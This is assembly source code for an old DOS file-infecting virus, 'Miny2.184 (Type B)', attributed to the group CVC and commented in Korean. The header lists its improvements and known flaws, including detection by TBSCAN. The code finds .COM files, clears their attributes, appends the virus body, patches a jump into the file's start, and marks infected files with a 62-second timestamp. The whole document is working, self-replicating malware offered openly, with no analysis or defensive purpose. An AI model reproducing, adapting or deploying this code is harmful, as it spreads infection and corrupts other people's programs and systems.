;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
;                                                               CVC #02  97/09
; Virus Name : Miny2.184 (Type B)
; Author : Osiris
; Group : CVC
; Date : 1997/08/17
;
; Type : Non-resident COM infector
;
; Miny2 (Type A) 의 개선판이다. 이버전에서는 A 형이 가지고 있던 에러발생시 처
; 리 루틴을 추가하였다. 이 버전에서 추가한 부분은 속성을 읽기/쓰기로 바꿀때
; 에러시 (주로 플로피 디스크가 쓰기 금지된 상태) 처리하는 부분이다.
;
; 다음버전은 COM 확장자를 가진 EXE 파일을 감염시키지 않는 버전을 선보이겠다.
; (예:DOS 7.0 의 COMMAND.COM)
;
; 여전히 다음과 같은 문제점이 존재한다.
;
; 1. TBSCAN 의 인공지능에 검색된다.
; 2. COM 확장자를 가진 EXE 파일을 감염시킨다.
;
;
;
;
;
;
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
            .MODEL  TINY
            .CODE

 Miny2:     nop                         ; 쓰레기값 (아무일도 안한다.)
            nop                         ; 앞부분 복구시 바이러스가 파괴되기
            nop                         ; 때문에 이 값을 넣었다.
 start:
            call  Next                  ;
 Next:      pop   bp                    ;
            sub   bp,offset Next        ; BP = 바이러스 시작지점

            lea   si,COM_head[BP]       ;
            mov   di,100h               ; COM 의 앞부분을 복구한다.
            push  di                    ;
            movsw                       ;
            movsb                       ;

            mov   cx,0080h              ; DTA 로 사용해 PSP 가 파괴되므로
            mov   si,0080h              ; 잠시 저장한다.
            lea   di,End_Virus[BP]      ;
            repz  movsb                 ;

            mov   ah,4Eh                ; 파일 찾기
            mov   cx,00100011B
            lea   dx,Match_COM[BP]
 Find:      int   21h
            jnc   ChkInfected           ;
 Restart:
            lea   si,End_Virus[BP]      ; 원래 DTA 복구
            mov   di,0080h
            mov   cx,0080h
            repz  movsb
            RET

 ChkInfected:                           ; 감염 여부를 확인한다.
            mov   al,DS:[0096h]         ; 62 초 인지 검사한다.
            and   al,1Fh
            cmp   al,1Fh
            jnz   Infect
            mov   ah,4Fh                ; 다음 파일 찾기
            jmp   Find
 Infect:
            mov   ax,4301h              ; 읽기/쓰기 속성으로 바꿈
            xor   cx,cx
            mov   dx,009Eh
            int   21h
            jc    Restart               ; 에러시 DTA 복구후 종료

            mov   ax,3D02h              ; 파일 오픈
            int   21h

            xchg  ax,bx                 ; 파일 핸들 얻기

            mov   ax,5700h              ; 파일 작성 시간 얻기
            int   21h
            push  cx                    ; 작성 시간 저장
            push  dx                    ;

            mov   ah,3Fh                ; 앞부분 읽기
            lea   dx,COM_Head[BP]       ; 버퍼 주소
            mov   cx,0003               ; 3 바이트
            int   21h

            mov   al,02                 ; 파일 끝으로 이동
            call  lseek

            sub   ax,3                  ; 점프값 계산
            mov   word ptr JumpCode[BP+1],ax     ;

            mov   ah,40h                ; 바이러스 쓰기
            mov   cx,offset End_virus - 3 - 2
            lea   dx,start[BP]
            int   21h

            mov   al,00                 ; 처음으로 이동
            call  lseek

            mov   ah,40h                ; 점프 코드 쓰기
            mov   cx,0003
            lea   dx,JumpCode[BP]
            int   21h

            pop   dx                    ; 파일 작성 시간 복구
            pop   cx                    ;
            or    cx,+1Fh               ; 62 초로 만들기
            mov   ax,5701h              ;
            int   21h

 Close:
            mov   ah,3Eh                ; 파일 닫기
            int   21h
            jmp   Restart

 lseek:                                 ;
            xor   cx,cx
            xor   dx,dx
            mov   ah,42h
            int   21h
            ret

 COM_head   db    0CDh,20h,90h          ; COM 앞부분
 Match_COM  db    '*.com',00            ; COM 파일 찾기
            db    'Miny2'               ; 미니 2
 JumpCode   db    0E9h
            db    ?,?
 End_Virus:
            END   Miny2

